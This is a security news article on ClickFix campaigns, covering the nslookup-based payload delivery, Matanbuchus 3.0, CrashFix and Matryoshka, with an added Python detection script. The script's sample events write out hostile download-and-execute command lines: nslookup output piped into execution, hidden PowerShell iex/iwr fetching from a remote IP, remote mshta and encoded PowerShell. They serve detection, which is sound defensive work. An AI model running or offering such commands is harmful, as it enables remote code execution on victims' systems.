Researchers with cybersecurity firm ESET last year reported that the use of ClickFix methods in attacks grew more than 500% during the first half of 2025 compared with the last six months of the year before, accounting for almost 8% of attacks blocked by the firm during that time and becoming the second most common attack vector after phishing.
It was a surprising development for a cyber threat that had only emerged in late 2023, though it echoed what other security vendors have found in recent months, not only with the use of ClickFix in campaigns but also in its rapid evolution.
“The payloads at the end of ClickFix attacks vary widely – from infostealers to ransomware and even to nation-state malware – making this a versatile and formidable threat across Windows, Linux, and macOS,” wrote Jiří Kropáč, director of ESET’s Threat Prevention Labs.
In a report this week, Huntress security researchers Anna Pham and Michael Tigges called ClickFix “the social engineering technique that just won’t die.”
“ClickFix became one of the most prevalent initial access methods in 2025, adopted by both cybercriminal and nation-state actors alike,” Pham and Tigges wrote. “The technique tricks victims into copying and pasting malicious commands into their own systems, effectively turning users into the delivery mechanism and bypassing traditional email-based security controls entirely.”
Huntress is one of several security firms that have reported on ClickFix campaigns this month and on the continuing development work by the threat groups behind them. The vendor detailed a ClickFix infection chain that delivers Matanbuchus 3.0, a malware-as-a-service (MaaS) loader that has been sold on Russian-speaking underground forums since February 2021.
Previous Matanbuchus variants have delivered payloads such as Cobalt Strike, QakBot, DanaBot, the Rhadamanthys stealer, and NetSupport RAT, according to Pham and Tigges. Version 3.0 is a rewrite of the loader's codebase and, judging by its price of $10,000 to $15,000 a month, is used for high-value, targeted attacks rather than mass campaigns. In this chain it also delivered a custom implant the researchers had not seen before, which Huntress is calling AstarionRAT; its eventual goal is to deploy ransomware or exfiltrate data from victims' systems.
The attack starts with a ClickFix lure built on brand impersonation: fragments of recognizable security and cloud brand names are combined into fabricated but plausible-sounding service names. The page then prompts the victim to execute a command, which runs an MSI installer that drops Matanbuchus 3.0.
Meanwhile, Microsoft Threat Intelligence wrote about a ClickFix campaign that asks “targets to run a command that executes a custom DNS lookup and parses the `Name:` response to receive the next-stage payload for execution.” Fetching the next stage through a DNS lookup is a new twist in the delivery step; the lure itself still relies on the familiar messages about fixing errors or installing updates that get users to run the pasted command without realizing what it does.
Pieter Arntz, malware analyst at Malwarebytes, wrote that “apparently, the criminals behind these campaigns have figured out that mshta and Powershell commands are increasingly being blocked by security software, so they have developed a new method using nslookup.”
With the new method, users are lured into running an nslookup command that names a resolver on the command line (nslookup accepts a DNS server as its second argument), so the query goes directly to a server controlled by the attacker rather than to the system's configured DNS server. Because the lookup never passes through the organization's own resolver, any DNS filtering applied there is bypassed.
“The initial stages are pretty much the same as we have seen before: fake CAPTCHA instructions to prove you’re not a bot, solving non-existing computer problems or updates, causing browser crashes, and even instruction videos,” Arntz wrote. “Nslookup is a built‑in tool to use the internet ‘phonebook,’ and the criminals are basically abusing that phonebook to smuggle in instructions and malware instead of just getting an address.”
Nslookup is used to troubleshoot network problems, check if DNS is configured correctly, and investigate domains, he wrote. It’s not typically used to download or run programs. However, in this case, the bad actors “configured a server to reply with data that is crafted so that part of the ‘answer’ is actually another command or a pointer to malware, not just a normal IP address,” Arntz added.
That sets in motion a chain that downloads a ZIP archive from the external server, extracts a malicious Python script from it to run reconnaissance and discovery commands, and drops a Visual Basic script, which in turn drops and executes ModeloRAT, a Python-based remote access trojan (RAT) that gives the attackers control of the infected Windows system.
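The DNS-based chain above, and the mshta and PowerShell variants it replaced, all share one telemetry trait: a built-in tool is invoked from a pasted command line with its output or arguments wired into something that executes. The script below is an added example, not code from Microsoft, Malwarebytes or Huntress, that runs a few heuristic command-line rules over constructed process-creation records. The sample events, hostnames and IPs are made up for the example, and the regexes are assumed patterns rather than any vendor's signatures; they are meant to show the shape of the detection, not to be deployed as-is.

```python
import re

# Constructed sample process-creation records, loosely in the shape of a
# Sysmon Event ID 1 log. They are made up for this example, not real telemetry,
# and the hosts/IPs are documentation addresses.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": "cmd.exe",
     "cmdline": "cmd.exe /c for /f \"tokens=2\" %a in ('nslookup verify.example 198.51.100.7 ^| findstr Name:') do %a"},
    {"pid": 4121, "image": "nslookup.exe",
     "cmdline": "nslookup www.example.com"},
    {"pid": 4122, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (iwr 'http://203.0.113.9/verify.txt').Content\""},
    {"pid": 4123, "image": "mshta.exe",
     "cmdline": "mshta.exe https://203.0.113.9/fix.hta"},
    {"pid": 4124, "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"pid": 4125, "image": "powershell.exe",
     "cmdline": "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAuAC4ALgA="},
]

# Heuristic rules (assumed patterns, not vendor signatures). Each flags a way a
# pasted ClickFix command turns a built-in tool into a downloader or executor.
RULES = [
    # nslookup output fed into another command (for /f, findstr, Select-String):
    # legitimate troubleshooting rarely parses the answer and acts on it.
    ("nslookup_output_parsed",
     re.compile(r'''(?:for\s*/f.*\(\s*["']?nslookup|nslookup[^|]*\|\s*(?:findstr|find\b|select-string|foreach|%\{))''', re.I)),
    # mshta pointed at a remote URL.
    ("mshta_remote_url",
     re.compile(r'''mshta(?:\.exe)?\s+["']?https?://''', re.I)),
    # Hidden-window PowerShell that downloads and evaluates content.
    ("powershell_hidden_download_exec",
     re.compile(r'''powershell(?:\.exe)?.*-w(?:indowstyle)?\s+h(?:idden)?.*(?:\biex\b|invoke-expression|downloadstring|\biwr\b|invoke-webrequest)''', re.I)),
    # PowerShell with a long base64 -EncodedCommand argument.
    ("powershell_encoded_command",
     re.compile(r'''powershell(?:\.exe)?.*\s-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}''', re.I)),
]


def scan(events):
    """Return [(pid, rule_name), ...] for every event whose command line matches a rule."""
    hits = []
    for ev in events:
        for name, rx in RULES:
            if rx.search(ev["cmdline"]):
                hits.append((ev["pid"], name))
    return hits


if __name__ == "__main__":
    for pid, name in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {name}")
```

The plain `nslookup www.example.com` record is deliberately left unflagged: the tool itself is not the signal, the piping of its answer into execution is. In a real pipeline these rules would be one input among several; pairing them with the parent process (a command pasted into the Run dialog is spawned by explorer.exe, for example) and with the follow-on child processes would cut the false-positive rate, but that correlation is an assumption of this example and not something the reports above describe.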
“Long story short, the cybercriminals have found yet another way to use a trusted technical tool and make it secretly carry the next step of the attack, all triggered by the victim following what looks like harmless copy‑paste support instructions,” Arntz wrote. “At which point they might hand over the control over their system.”
The report came a couple of weeks after Microsoft wrote about a ClickFix campaign that uses a ploy that it called “CrashFix,” in which the threat actors deliberately crash victims’ browsers and then entice users to execute a malicious command by convincing them that doing so would fix the browser problem. The researchers wrote that “This variant represents a notable escalation in ClickFix tradecraft, combining user disruption with social engineering to increase execution success while reducing reliance on traditional exploit techniques.”
Also earlier this month, analysts with Intego Antivirus Labs wrote about a new ClickFix campaign called “Matryoshka” that is aimed at macOS users; it uses a fake installation-and-fix prompt to trick targets into executing a malicious Terminal command.
“While the ClickFix tactic is not new, this campaign introduces stronger evasion techniques – including an in-memory, compressed wrapper and API-gated network communications — designed to hinder static analysis and automated sandboxes,” they wrote. “At a high level, the attack relies on typosquatting and redirect infrastructure to deliver a ‘paste this fix’ prompt. Once executed, a loader retrieves an AppleScript payload that attempts to harvest browser credentials and target crypto wallet applications.”